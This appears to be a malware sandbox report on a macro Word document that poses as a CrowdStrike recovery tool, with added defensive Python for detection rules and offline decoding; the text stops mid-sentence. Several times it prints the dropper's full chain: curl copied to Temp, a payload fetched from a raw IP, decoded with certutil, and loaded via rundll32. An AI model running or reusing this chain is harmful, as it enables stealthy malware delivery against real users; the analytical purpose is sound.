Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
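The process chain above (Word spawning cmd.exe, which copies System32\curl.exe into Temp, round-trips it through certutil, fetches a payload from a raw IP with the copied curl, decodes it with certutil, and loads the resulting DLL with rundll32) breaks into several behaviours that are each detectable on their own. The Python below is an added example and not the sandbox's own logic: it parses "Process created" lines in the report's own format (the sample lines are constructed from this report's entries) and tags each event with every rule it trips, so a responder can see which stages would still fire in endpoint telemetry if the others were changed. The rule names, the app and shell lists, and the temp-path marker are my own choices.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample: "Process created" entries copied in the report's line format, one process per line.
SAMPLE_LOG = r"""
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
"""

# Image paths contain spaces, so the child image is taken as everything up to the first ".exe " boundary.
LINE_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<image>.+?\.exe) (?P<cmdline>.+)$", re.IGNORECASE)

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_TEMP = r"\appdata\local\temp"  # assumed marker for a user-writable staging directory
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.IGNORECASE)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def parse_line(line: str):
    """Split one report line into (parent image, child image, child command line); None if not a process event."""
    m = LINE_RE.match(line.strip())
    return (m.group("parent"), m.group("image"), m.group("cmdline")) if m else None


def classify(parent: str, image: str, cmdline: str) -> list[str]:
    """Return every rule label (my own names) the event trips; the stages are scored independently."""
    hits = []
    p, c, cl = basename(parent), basename(image), cmdline.lower()
    if p in OFFICE_APPS and c in SHELL_HOSTS:
        hits.append("office_spawns_shell")           # same idea as Sigma's Office child-process rule
    if c == "xcopy.exe" and "\\system32\\" in cl and USER_TEMP in cl:
        hits.append("system_binary_copied_to_temp")  # LOLBin relocated to a user-writable path
    if c == "certutil.exe" and "-decode" in cl:
        hits.append("certutil_decode")               # certutil used as a base64 decoder
    if USER_TEMP in image.lower():
        hits.append("image_executed_from_temp")      # the copied curl.exe, not the System32 one
    if c == "curl.exe" and RAW_IP_URL.search(cmdline):
        hits.append("curl_download_from_raw_ip")
    if c == "rundll32.exe" and USER_TEMP in cl and ".dll" in cl:
        hits.append("rundll32_loads_temp_dll")
    return hits


def analyze(report_text: str) -> dict[str, list[str]]:
    """Map rule label -> list of child images that tripped it, over every process-creation line."""
    findings: dict[str, list[str]] = {}
    for line in report_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        for rule in classify(*event):
            findings.setdefault(rule, []).append(event[1])
    return findings


if __name__ == "__main__":
    for rule, images in sorted(analyze(SAMPLE_LOG).items()):
        print(f"{rule:30} {', '.join(images)}")
```

Run against the sample, six of the eight events are flagged and the two benign ones (the Word host itself and the Chrome launch) are not; the certutil -encode step is deliberately left unflagged, since encoding a file is far more common in admin scripts than decoding one into an executable.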
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptbase.dll
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0001.tmp.16.dr Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0001.tmp.16.dr Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0001.tmp.16.dr Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0001.tmp.16.dr Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0000.tmp.16.dr Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.16.dr Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.16.dr Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.16.dr Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.16.dr Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.16.dr Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.16.dr Initial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\chrome_BITS_3236_441263539
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module ThisDocument Name: ThisDocument
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA, 7_2_000000013F4A1D84
Source: curl.exe.4.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\AppData\Local\Temp\curl.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (43 identical entries collapsed)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior (23 identical entries collapsed)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (9 identical entries collapsed)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (43 identical entries collapsed)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (3 identical entries collapsed)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr Binary or memory string: Steps to Recover Hyper-V virtual machines
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr Binary or memory string: Using recovery media on Hyper-V virtual machines
Source: document.xml Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr Binary or memory string: ph3330 The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.
Source: document.xml Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr Binary or memory string: Hyper-V settings
Source: curl.txt.5.dr Binary or memory string: jQ0qtQUAjVMci0EIQYVBIHQLSIsBSIlE3CBI/8NIg8EQSIPqAXXiRI1CCEiL00yN
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr Binary or memory string: https://go.microsoft.com/fwlink/?linkid=2280386. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr Binary or memory string: s Hyper-V settings.
Source: document.xml Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr Binary or memory string: Hyper-V Settings
Source: document.xml Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA, 7_2_000000013F4A1D84
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4DAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_000000013F4DAFA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F35AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_000000013F35AFA0
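The curl.txt string above is the output of the `certutil -f -encode` step in this report's command line: base64 wrapped in PEM-style certificate armour, which `certutil -f -decode` turns back into the original bytes. The round trip is lossless, so the curl.exe that ends up in Temp is a byte-identical copy of Windows' own C:\Windows\System32\curl.exe, and the same transform later turns the downloaded mscorsvc.txt into mscorsvc.dll. The following Python is an added example, not code from the report or from the sample, for recovering and triaging such a staged file offline: it strips the armour (and accepts bare base64, which `certutil -decode` also accepts), checks for an MZ/PE header, and hashes the result for pivoting. The SAMPLE_PE bytes are a constructed stand-in, not the real payload.

```python
"""Recover a binary staged as certutil base64 text (e.g. mscorsvc.txt) and triage it."""
import base64
import hashlib
import re

# Constructed stand-in for the staged payload: a minimal MZ/PE header, NOT the
# real mscorsvc.dll from the report. e_lfanew at offset 0x3C points at "PE\0\0".
SAMPLE_PE = (b"MZ\x90\x00" + b"\x00" * 56          # DOS header up to 0x3C
             + (0x80).to_bytes(4, "little")        # e_lfanew = 0x80
             + b"\x00" * 64                         # DOS stub padding
             + b"PE\x00\x00")                       # NT signature at 0x80

ARMOUR = re.compile(r"^-----(BEGIN|END) [A-Z ]+-----$")


def certutil_encode(data: bytes) -> str:
    """Mimic `certutil -f -encode`: PEM armour around 64-column base64 lines."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join(["-----BEGIN CERTIFICATE-----", *lines, "-----END CERTIFICATE-----", ""])


def certutil_decode(text: str) -> bytes:
    """Undo `certutil -f -decode`: drop armour lines, tolerate bare base64 too."""
    body = "".join(
        line.strip() for line in text.splitlines()
        if line.strip() and not ARMOUR.match(line.strip())
    )
    return base64.b64decode(body, validate=True)


def triage(blob: bytes) -> dict:
    """First questions for the decoded file: is it a PE, and what hash do we pivot on?"""
    is_mz = blob[:2] == b"MZ"
    pe_off = int.from_bytes(blob[0x3C:0x40], "little") if len(blob) >= 0x40 else -1
    has_pe_sig = is_mz and 0 <= pe_off <= len(blob) - 4 and blob[pe_off:pe_off + 4] == b"PE\x00\x00"
    return {
        "size": len(blob),
        "mz": is_mz,
        "pe_signature": has_pe_sig,
        "sha256": hashlib.sha256(blob).hexdigest(),
    }


def recover_file(txt_path: str, out_path: str) -> dict:
    """Offline equivalent of `certutil -f -decode <txt> <out>` followed by triage."""
    with open(txt_path, "r", encoding="ascii", errors="ignore") as fh:
        blob = certutil_decode(fh.read())
    with open(out_path, "wb") as fh:
        fh.write(blob)
    return triage(blob)


if __name__ == "__main__":
    # Round trip exactly as the report's command line does with curl.exe:
    # encode, then decode, yields a byte-identical file.
    staged = certutil_encode(SAMPLE_PE)
    recovered = certutil_decode(staged)
    assert recovered == SAMPLE_PE
    print(triage(recovered))
```

Point `recover_file` at a carved mscorsvc.txt (or the curl.txt above) to get the DLL back without running certutil on an analysis box; the SHA-256 it returns is the value to search for across other hosts, since the .txt intermediates are deleted by the command line and only the decoded DLL and the network request remain.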

HIPS / PFW / Operating System Protection Evasion

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE indicator, VBA stomping: true
Source: ~WRC0001.tmp.16.dr OLE indicator, VBA stomping: true
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c xcopy c:\windows\system32\curl.exe c:\users\user\appdata\local\temp & certutil -f -encode c:\users\user\appdata\local\temp\curl.exe c:\users\user\appdata\local\temp\curl.txt & certutil -f -decode c:\users\user\appdata\local\temp\curl.txt c:\users\user\appdata\local\temp\curl.exe & c:\users\user\appdata\local\temp\curl.exe http://172.104.160.126:8099/payload2.txt -o c:\users\user\appdata\local\temp\mscorsvc.txt & certutil -f -decode c:\users\user\appdata\local\temp\mscorsvc.txt c:\users\user\appdata\local\temp\mscorsvc.dll & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\curl.txt & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\mscorsvc.txt & start " " rundll32 c:\users\user\appdata\local\temp\mscorsvc.dll,dllmain & exit
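The command line above chains only Windows-signed binaries: xcopy relocates the system curl.exe to the user's Temp, certutil round-trips it through base64, the relocated curl fetches payload2.txt over plain HTTP, certutil decodes it into mscorsvc.dll, the intermediates are deleted, and rundll32 calls the DLL's DllMain export. Because that curl.exe is the stock System32 binary (the xcopy source and the curl.pdb reference show this), the signatures about dynamic API resolution and listening sockets describe curl's own code, not the payload; the detectable signal is where curl runs from and which chain it sits in. The following Python is an added example, not from the report or the sample: per-event rules over constructed process-creation records (built from the report's command lines; the WINWORD parent of the first cmd.exe is assumed, since the report shows cmd.exe nesting under cmd.exe, and the last record is a benign `certutil -hashfile` control) plus a chain verdict that requires a certutil decode, a 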